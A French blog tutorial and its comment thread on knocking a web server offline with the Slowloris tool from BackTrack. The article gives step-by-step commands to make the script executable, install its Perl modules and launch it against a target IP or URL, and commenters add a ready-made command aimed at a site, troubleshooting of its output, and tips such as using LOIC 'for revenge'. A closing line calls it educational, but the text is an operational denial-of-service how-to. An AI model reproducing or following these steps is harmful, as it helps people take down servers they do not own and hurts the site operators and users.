Les attaques Ddos Sony les connait bien, en effet se sont se type d’attaque qui lors donne autant de fil à retordre ses temps si. Une attaque par déni de service (denial of service attack, d’où l’abréviation DoS) est une attaque ayant pour but de rendre indisponible un service, d’empêcher les utilisateurs légitimes d’un service de l’utiliser. Il y a plusieurs type d’attaque :

  • l’inondation d’un réseau afin d’empêcher son fonctionnement ;
  • la perturbation des connexions entre deux machines, empêchant l’accès à un service particulier ;
  • l’obstruction d’accès à un service à une personne en particulier.

Dans cet article on va voir comment réaliser une petit attaque Ddos du type « l’inondation d’un réseau afin d’empêcher son fonctionnement » sur un serveur web.

Que faut il avoir pour réaliser le tuto ?

  • Un ordinateur , un mac … un machine capable de booter sur Backtrack
  • Un CD de Backtrack quelques soit le version

Quel outils utiliser ?

Pour arriver à nos fin et donc initialiser une attaque Ddos nous utiliserons Slowloris. c’est est un outil d’attaque trés puissant utilisé par des hacker « professionnel ». Il permettant de faire tomber effroyablement rapidement un serveur web. Cet outils a été principalement développé pour affecter les serveurs Apache 1.x et 2.x (67% des serveurs sur le net !!).

Fonctionnement

Ce script écrit en perl au nom singulier de slowloris ce qui veut dire paresseux, est d’envoyer des requêtes HTTP partielles, à intervalle régulier, afin de garder les sockets ouverts. L’attaquant, ou du moins slowloris, initie donc une requête GET vers le serveur cible, il y a donc bien un échange entre les deux entités, comme le ferai n’importe quel client HTTP vers le serveur, or ici slowloris va faire en sorte que l’échange ne se termine jamais !

Slowloris ne va pas envoyer les séquences attendues par le serveur mais lui fournira de temps en temps un en-tête bidon qui sera royalement ignoré par le serveur, mais qui permettra de maintenir la connexion TCP ouverte, empêchant ainsi le socket d’être fermé, et c’est là tout l’intérêt ! Le serveur devient rapidement saturé, et là, c’est le déni de service…

L’installation sur Backtrack

Tout d’abord il faut télécharger le scripte sur le site de RSnake , une fois le scripte téléchargé il faut le placer sur le bureau de Backtrack si le fichier n’est pas sur le bureau tout les commande que je vais vous donner ne fonctionnerons pas.

Maintenant il faut rendre le fichier « slowloris.pl » exécutable pour ce faire il faut ouvrier un terminal  et executer la comande suivante:

chmod +x slowloris.pl

Pour fonctionner Slowloris a besoin de quelque module perl. Pour les installer il faut éxécuter les commandes suivante:

perl -MCPAN -e shell

install IO::Socket::INET

install Getopt::Long

install Getopt::Long

install Config

install strict

Pour démarrer Slowloris il faut éxécuter la syntaxe suivante:

./slowloris.pl -dns <ip_cible ou URL>

Vous étez maintenant en mesure de réaliser des attaque Ddos.

Pour information se tuto est uniquement a but éducatif et je rappel que les attaque Ddos sur interdit par la loi.

Recherches qui ont permis de trouver cet article:

23 commentaires pour “Réaliser une attaque HTTP type Ddos avec Backtrack”

  • bonjour,

    d’abord j’aimerai vous présenter mes sincère remerciement pour votre aide.

    est ce que vous pouvez me dire comment je peux arrêter l’attaque de DDOS si le lance.

    merci Monsieur

    cordialement

    bouras hicham

    Master system intelligent et la sécurité des réseaux

  • Salut,
    Comme n’importe quelle application fonctionnant dans un terminal sous linux tu peux l’arrêter avec le raccourcie clavier ctrl + C

  • Tu peux donner les commandes a taper pour réaliser cette attaque ? Et il me semble que Slowloris est déjà installé dans la version 5 de BT, à vérifier…

    Cordialement,

    Ping.

  • J’ai donné la commande dans l’article c’est « ./slowloris.pl -dns « 

  • Ah effectivement j’avais pas vu, mais donc dès que tu lances Slowloris l’attaque Ddos se lance ?

  • OUI et tu verras quelque chose qui ressemble aux screen présent dans l’article

  • peut on faire tomber un serveur tout seul? j’entend par la avec notre seule machine

  • Après avoir tapé perl -MCPAN -e shell, on me demande « Please enter the URL of your CPAN mirror »
    Quelle URL faut-il écrire ?

    Merci

  • Bonjour monsieur svp il a t’il un moyen de prevenir les attaque du genre afin de ne pas en etre victime?

  • bonjour, je voulais savoir si c’etais possible, ou si vous aviez déjà fait un tuto sur une « installation » de ces dossiers sur backtrack car je ne sais pas du tout mais alors pas du tout me servir de backtrack, ni où me le procurer (un valide) etc.. =)
    merci

  • pardon, je n’ai trouvé Backtack que sous LInux, alors que mon PC tourne sous windows^^
    est ce que backtrackt va marcher
    Merci d’avance

  • sa marche pas moi ya ecri unknow command ./slowloris.pl mais fo ptetre repasser ds le terminal normal pour la commande ? et le fichier faut l’apeller .sh ou .pl ? en tout cas j’ai suivi la procédure sa foire regarde : cpan[6]> ./slowloris.pl -dns
    Unknown shell command ‘./slowloris.pl’. Type ? for help.

  • tu prend slowloris.pl (copier) puis un blocnote (sous Backtrack) tu colle le dessin de code. puis tu sauvegarde le fichier en l’appelant slowloris.pl puis tu le save sur desktop . ensuite tu ouvre konsole, (respecte les majuscule)
    cd /root/Desktop
    perl slowloris.pl -dns http://www.exemple.com -timeout 1 puis entrer et sa se fait tout seul :P Et Voilà ! DDOS ATTACK !

  • Puissant, Simple Et Efficace. et oui on peut faire tomber un serveur tout seul . mais seulement les serveurs Apache 1.x et 2.x (67% des serveurs sur le net). Tout Dépendament Du Serveur . Mais Plus On Est De Fou Plus On Ris

  • et pour ceux sous windows download vm ware workstation fait toi un faux linux et installe backtrack. ya des video sur youtube. bon hack !

  • Au lancement de l’attaque j’ai « slowloris has now sent 0 packets »

    Une idée ?

  • c est fini tout ca ca marche que sur les serveurs qui ont une bande passante limitée ou qui n ont pas de load balancer c.a.d. 5 ou 6% des serveurs sur le net

  • celui qui veut vraiment trouver les failles d un serveur doit utiliser « nikto » sous linux et aprés encore faut il savoir comment exploiter ces failles , bon courage aux apprentis blackhat , moi je squatt sur redhat , mdr

  • Franchement je ne vois pas l’interêt a faire ce genre d’attaque (a part pour des fin de vengeance)Mais je trouve que slowloris et pratique et rapide quand on c’est l’utiliser. Mais je trouve annormal que des gens « s’amuse » a pirater des site qui appartienne à des personnes qu’il ne connaise même pas bon voila.

    Sinon utiliser aussi L.O.I.C moins puissant mais simpled’utilisation (a utiliser a des fin de vengence entre amis rien d’autre »

  • Pour installer les quelques modules perl , tu quitte a chaque fois le terminal tu réouvre un autre ? parce que quand genre j’ai installer le premier , ensuite dans le meme terminal sa va pas le deuxieme. Merci d’avance pour la reponse.

  • L’erreur est arrive9 au mauvais momnet, ca a e9tait confirmer que c’e9tait une erreur de Twitter et non des Anonimous. Et pour ceux qui balancent les rumeurs de euh.. ils vont hack Facebook, Twitter .., c’est de9bile de dire ca et de le croire. C’est leur moyens de communication, il n’y aurais pas les site facebook, twitter il n’y aurais jamais eu autant d’attaques.

  • Bonjour, est ce quelqu’un à une solution à ce problème svp

    Welcome to Slowloris – the low bandwidth, yet greedy and poisonous HTTP client
    Defaulting to port 80.
    Defaulting to a 5 second tcp connection timeout.
    Defaulting to 1000 connections.
    Multithreading enabled.
    Connecting to *********************************80 every 1 seconds with 1000 sockets:
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.
    Building sockets.

    Sending data.
    Current stats: Slowloris has now sent 0 packets successfully.
    This thread now sleeping for 1 seconds…

  • Merciiii un mec fait que de me ddos je vous love <3

Laisser un commentaire


Blogroll